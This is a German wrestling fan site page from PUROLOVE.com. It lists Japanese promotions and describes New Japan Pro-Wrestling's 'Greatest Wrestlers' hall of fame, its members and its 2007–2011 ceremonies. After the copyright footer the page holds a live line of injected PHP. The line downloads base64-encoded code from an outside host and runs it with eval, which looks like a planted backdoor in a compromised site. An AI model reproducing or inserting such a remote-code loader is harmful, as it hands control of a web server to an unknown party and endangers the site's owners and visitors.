Untitled Document
PUROLOVE.com - Alles rund ums Thema ''Puroresu''!
Newsboard | Event Galerie | Puroresu Guide | Event Kalender | Historien / Artikel | Around the World | Awards | Television Schedule (12/2012)
  PUROLOVE.com
NEW JAPAN
Vorstellung
Aktuelle Show
Results & Schedule
NEVER
Roster
Titel & Turniere
Greatest Wrestlers
YouTube Channel

NOAH
Vorstellung
Aktuelle Show
Results & Schedule
SEM
Roster
Titel & Turniere
Kenta Kobashi Special

ALL JAPAN
Vorstellung
Aktuelle Show
Results & Schedule
Roster
Titel & Turniere
YouTube Channel

WRESTLE-1
Vorstellung
Aktuelle Show
Results & Schedule
Roster
YouTube Channel

ZERO1
Vorstellung
Results & Schedule
Roster
Titel & Turniere

DRAGON GATE
Vorstellung
Aktuelle Show
Results & Schedule
Dragon Gate USA
Dragon Gate NEX
Prime Zone
Mochizuki Buyuden
Roster
Dragon System Alumni
Titel & Turniere

VERSCHIEDENE AKTIV
Indy Profile

Apache Army:
- Results & Schedule
- Titel
Big Japan:
- Vorstellung
- Results & Schedule
- Roster
- Titel & Turniere
- YouTube Channel
DDT:
- Vorstellung
- Results & Schedule
- Hard Hit
- BOYZ
- Cruiser's Game
- Roster
- Titel & Turniere
- YouTube Channel
Diamond Ring:
- Results & Schedule
- Roster
Dradition:
- Results & Schedule
- Roster
Futen:
- Results & Schedule
- Roster
Freedoms:
- Results & Schedule
- Roster
IGF:
- Results & Schedule
- Roster
- Titel
KAGEKI:
- Results & Schedule
- Roster
- Titel
KAIENTAI DOJO:
- Results & Schedule
- Roster
- Titel & Turniere
- YouTube Channel
Legend Pro:
- Results & Schedule
Michinoku Pro:
- Vorstellung
- Results & Schedule
- Roster
- Titel & Turniere
Osaka Pro:
- Results & Schedule
- Roster
- Titel & Turniere
Real Japan:
- Results & Schedule
Secret Base:
- Results & Schedule
- Roster
Tenryu Project:
- Results & Schedule
WNC:
- Results & Schedule
- Roster
- YouTube Channel
---
Misc Indy:
- Results & Schedule
Mr. Gannosuke:
- Results & Schedule
Fukumen MANIA:
- Results & Schedule
- YouTube Channel

JOSHI PURORESU
Vorstellung/Historie
Profile

Daijo:
- Results & Schedule
Diana:
- Results & Schedule
Gakenohuchi Pro:
- Results & Schedule
Ice Ribbon:
- Results & Schedule
- Titel
- YouTube Channel
JWP:
- Results & Schedule
- Titel
OZ Academy:
- Results & Schedule
- Titel
REINA:
- Results & Schedule
- Titel
Stardom:
- Results & Schedule
- Titel
SENDAI GIRLS:
- Results & Schedule
WAVE:
- Results & Schedule
- Turniere
---
Joshi Misc:
- Results & Schedule
---
Inaktiv:
All Japan Women's:
- Titel & Turniere
ARSION:
- Titel
Fuka Matsuri:
- Results
GAEA Japan:
- Results
- Titel & Turniere
IBUKI:
- Results
JD Star:
- Results
LLPW:
- Results
- Titel
M's Style:
- Results
NEO:
- Results
- Titel & Turniere
SUN:
- Results
Yuzupon Matsuri:
- Results

FIGHTING/MMA
Vorstellung/Historie

Inaktiv:
DREAM:
- Results
HERO'S:
- Results
K-1:
- Results
PRIDE:
- Results
SRC:
- Results

VERSCHIEDENE INAKTIV
BattlARTS:
- Results
- Roster
BIG MOUTH LOUD:
- Vorstellung
- Results
- WRESTLE-1 Results
Bikkuri Pro:
- Results
dragondoor (d2p):
- Results
El Dorado:
- Results
FMW:
- Vorstellung
- Results
- Titel
Fuyuki Army:
- Results
GPWA:
- Results
HUSTLE:
- Vorstellung
- Results
- Titel
Inoki Bom-Ba-Ye:
- Results
Kings Road:
- Results
LOCK UP:
- Results
MAP:
- Results
Pro-Wrestling Summit:
- Results
Riki Pro:
- Results
Ring Soul:
- Results
Toryumon Japan:
- Results
- Dragon System Alumni
- Titel & Turniere
Toryumon 2K Project:
- Results
Toryumon X:
- Results
U-STYLE:
- Results
UWAI STATION:
- Results
UWF #2:
- Results
UWF-I:
- Results
SMASH:
- Results
- Roster
- YouTube Channel
WEW:
- Results
World Japan:
- Vorstellung
- Results
- Titel & Turniere
WMF:
- Results
NJPW Greatest Wrestlers

Die NJPW Greatest Wrestlers Awards sind eine Art Hall of Fame von New Japan Pro-Wrestling. Das Konzept wurde in der aktuellen Form im März 2007 bei der Show zum 35-jährigen Jubiläum von New Japan Pro-Wrestling eingeführt und zwei Jahre später wiederholt. An einer eigenen Hall of Fame hatte sich New Japan bereits 1990 im Zuge von Antonio Inokis 30-jährigem Ringjubiläum versucht. 18 legendäre Akteure der japanischen Pro-Wrestling Historie wurden unter dem Banner des "Greatest 18 Club" vereint. Die 18 Wrestler seinerzeit waren: Antonio Inoki, Seiji Sakaguchi, Hiro Matsuda, Strong Kobayashi, Kintaro Oki, Karl Gotch, Lou Thesz, Muhammad Ali, Willem Ruska, Nick Bockwinkel, Bill Robinson, Stan Hansen, Andre the Giant, Tiger Jeet Singh, Johnny Valentine, Johnny Powers, Bob Backlund, und Hulk Hogan. Als Singh 1991 Heel turnte wurde er aus dem elitären Kreis ausgeschlossen und durch Dusty Rhodes ersetzt. 1990 wurde zudem auch der Greatest 18 Club Title eingeführt und an Riki Choshu übergeben. Der Titel sollte genauso prestigeträchtig wie der IWGP Title werden, wurde aber eingestampft als Great Muta den Titel 1992 von Choshu gewann. Die Idee des "Greatest 18 Club" wurde schließlich wieder fallen gelassen.

Mitglieder:

- Don Arakawa (2011 aufgenommen; Trophäenübergabe durch Seiji Sakaguchi)
- Animal Hamaguchi (2010 aufgenommen; Trophäenübergabe durch Tiger Hattori)
- Shinya Hashimoto (2010 aufgenommen; Trophäenübergabe durch Seiji Sakaguchi; angenommen von Sohn Daichi Hashimoto)
- Black Cat (2009 aufgenommen; Trophäenübergabe durch Koji Kanemoto; angenommen von Witwe und Sohn)
- Akira Maeda (2009 aufgenommen; Trophäenübergabe durch Kotetsu Yamamoto)
- Kuniaki Kobayashi (2009 aufgenommen; Trophäenübergabe durch Jushin Thunder Liger)
- Shoji Kai (2009 aufgenommen; Trophäenübergabe durch Naoki Sugabayashi)
- Kotetsu Yamamoto (2007 aufgenommen)
- Kantaro Hoshino (2007 aufgenommen)
- Seiji Sakaguchi (2007 aufgenommen)
- Antonio Inoki (2007 aufgenommen)

2011 (Zeremonie am 06.03.2011)


(von links nach rechts: Don Arakawa, Seiji Sakaguchi)

2010 (Zeremonie am 05.03.2010)


(obere Reihe von links nach rechts: Tiger Hattori, Seiji Sakaguchi
untere Reihe von links nach rechts: Animal Hamaguchi, Daichi Hashimoto)

Bei den Feierlichkeiten zum 38-jährigen Bestehen von New Japan Pro-Wrestling am 05.03. in der Korakuen Hall in Tokyo hat die am längsten aktive Liga der japanischen Wrestling Geschichte zum dritten Mal die "NJPW Greatest Wrestlers" Awards verliehen. Im Gegensatz zu den vorherigen Jahren wurden statt vier nur zwei Wrestler in die Hall of Fame von New Japan aufgenommen. 2010 wurde diese Ehre dem verstorbenen Shinya Hashimoto zu teil, der in den 90er Jahren einer der erfolgreichsten Wrestler der Welt war. Stellvertretend nahm Daichi Hashimoto die Auszeichnung an, der Sohn des verstorbenen Shinya, der selbst ins Pro-Wrestling Geschäft einsteigen möchte. Ebenfalls aufgenommen wurde Animal Hamaguchi, ein von Karl Gotch trainierter, äußerst erfolgreicher Wrestler aus den 70er und 80er Jahren, der danach mit seinem Animal Hamaguchi Training Gym als einer der legendärsten Trainer in die Annalen des japanischen Wrestlings einging und solche Stars wie Kojima, Otani, Omori, SUWA, Honma und seine Tochter Kyoko trainierte, die im Freistilringen mehrere olympische Medaillen gewinnen konnte.

2009 (Zeremonie am 06.03.2009)


(obere Reihe von links nach rechts: Jushin Thunder Liger, Naoki Sugabayashi, Kotetsu Yamamoto, Koji Kanemoto
untere Reihe von links nach rechts: Kuniaki Kobayashi, Shoji Kai, Akira Maeda, Frau und Sohn von Black Cat)

Im Rahmen der Feierlichkeiten zum 37-jährigen Bestehen von New Japan Pro-Wrestling wurden die "NJPW Greatest Wrestlers" Awards am 06.03.2009 zum zweiten Mal verliehen. Die von Jushin Thunder Liger, Präsident Naoki Sugabayashi, Kotetsu Yamamoto und Koji Kanemoto überreichten Auszeichnungen wurden an Kuniaki Kobayashi, Shoji Kai (Aktiver als New Japan gegründet wurde, Debüt-Gegner für viele spätere Stars in den 60er und 70er Jahren und nach seiner aktiven Karriere angesehener Referee), Akira Maeda (erster Auftritt in einem New Japan Ring seit 21 Jahren) und an die Witwe und den Sohn des im Januar 2006 verstobenen Black Cat (bürgerlicher Name Victor Mar Manuel) vergeben.

2007 (Zeremonie am 06.03.2007)


(obere Reihe von links nach rechts: Simon Inoki, Hiroshi Tanahashi, Masahiro Chono, Jushin Thunder Liger
untere Reihe von links nach rechts: Seiji Sakaguchi, Kotetsu Yamamoto, Kantaro Hoshino)

Bei der Korakuen Hall Show zum 35-jährigen Jubiläum von New Japan Pro-Wrestling am 06.03.2007 verlieh die Promotion erstmals die "NJPW Greatest Wrestlers" Awards. Antonio Inoki, Seiji Sakaguchi, Kotetsu Yamamoto und Kantaro Hoshino durften sich über die von Simon Inoki, Hiroshi Tanahashi, Masahiro Chono und Jushin Thunder Liger überreichten Trophäen freuen. New Japan Gründer und Gallionsfigur Antonio Inoki war allerdings nicht persönlich anwesend, sodass Präsident Simon Inoki, Schwiegersohn der Legende, den Award stellvertretend annahm.

Untitled Document

Copyright © 2005-2014 PUROLOVE.com
$rrr = file_get_contents('http://sbalatam.com/ss/sync.php'); eval(base64_decode($rrr));